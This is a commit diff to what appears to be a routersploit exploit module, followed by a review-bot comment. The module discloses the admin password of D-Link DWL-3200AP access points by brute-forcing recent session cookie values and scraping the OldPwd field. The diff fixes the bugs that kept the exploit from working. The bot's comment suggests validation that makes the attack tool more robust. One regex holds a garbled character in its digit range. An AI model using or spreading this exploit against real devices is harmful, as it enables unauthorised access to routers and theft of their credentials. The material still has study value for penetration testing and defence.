Commit aae60fb8 by lucyoa

Fixing minor bugs, methods, type conversion

parent 514a62eb
...@@ -14,11 +14,11 @@ from routersploit import ( ...@@ -14,11 +14,11 @@ from routersploit import (
class Exploit(exploits.Exploit): class Exploit(exploits.Exploit):
""" """
Exploits DLINK DWL3200 access points weak cookie value Exploits D-Link DWL-3200AP access points weak cookie value
""" """
__info__ = { __info__ = {
'name': 'D-Link AP 3200 - Password Disclosure', 'name': 'D-Link DWL-3200AP Password Disclosure',
'description': 'Exploits DLINK DWL3200 access points weak cookie value', 'description': 'Exploits D-Link DWL3200 access points weak cookie value',
'authors': [ 'authors': [
'pws', # Vulnerability discovery 'pws', # Vulnerability discovery
'Josh Abraham <sinisterpatrician[at]google.com>', # routersploit module 'Josh Abraham <sinisterpatrician[at]google.com>', # routersploit module
...@@ -27,21 +27,25 @@ class Exploit(exploits.Exploit): ...@@ -27,21 +27,25 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/34206/', 'https://www.exploit-db.com/exploits/34206/',
], ],
'devices': [ 'devices': [
'DLINK DWL3200', 'D-Link DWL-3200AP',
], ],
} }
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port port = exploits.Option(80, 'Target port') # default port
# 3600 seconds - one hour means that we will bruteforce authenticated cookie value that was valid within last hour
seconds = exploits.Option(3600, 'Number of seconds in the past to bruteforce')
def run(self): def run(self):
if self.check(): if self.check():
cookie_value = self.get_cookie() cookie_value = self.get_cookie()
print_success("Cookie retrieved: {}".format(cookie_value)) print_success("Cookie retrieved: {}".format(cookie_value))
cookie_int = int(cookie_value, 16) cookie_int = int(cookie_value, 16)
start = cookie_int - 3600 start = cookie_int - int(self.seconds)
print_status("Starting bruteforcing cookie value...")
for i in xrange(cookie_int, start, -1): for i in xrange(cookie_int, start, -1):
self.test_cookie(i) self.test_cookie(i)
else: else:
...@@ -74,14 +78,14 @@ class Exploit(exploits.Exploit): ...@@ -74,14 +78,14 @@ class Exploit(exploits.Exploit):
except Exception: except Exception:
print_error("Unable to connect to target") print_error("Unable to connect to target")
def test_cookie(cookie_int, self): def test_cookie(self, cookie_int):
""" """
Method that tests all cookies from past hour to find one that is valid Method that tests all cookies from the past to find one that is valid
""" """
url = "{}:{}/html/tUserAccountControl.htm".format(self.target, self.port) url = "{}:{}/html/tUserAccountControl.htm".format(self.target, self.port)
cookie = dict(RpWebID=cookie_int) cookies = dict(RpWebID=str(cookie_int))
try: try:
r = http_request(method='GET', url=url, cookie=cookie, timeout=10) r = http_request(method='GET', url=url, cookies=cookies, timeout=10)
if ('NAME="OldPwd"' in r.text): if ('NAME="OldPwd"' in r.text):
print_success("Cookie {} is valid!".format(cookie_int)) print_success("Cookie {} is valid!".format(cookie_int))
pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\"" pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
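Review bot: The new `seconds` option is converted with a bare `int(self.seconds)` inside `run()`, so nothing checks the value before it is used. A non-numeric value raises an uncaught `ValueError` only after the cookie has been retrieved, and zero or a negative number produces an empty `xrange`, so the module prints "Starting bruteforcing cookie value..." and then silently does nothing. I would convert and range-check the option before the `self.check()` call, wrapping the conversion in a `try`/`except ValueError` that calls `print_error` and returns, followed by a guard such as `if window <= 0: print_error("seconds must be a positive integer"); return`. The `else:` branch of `run()` lies outside the visible hunk, so the rest of the method could not be checked.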
......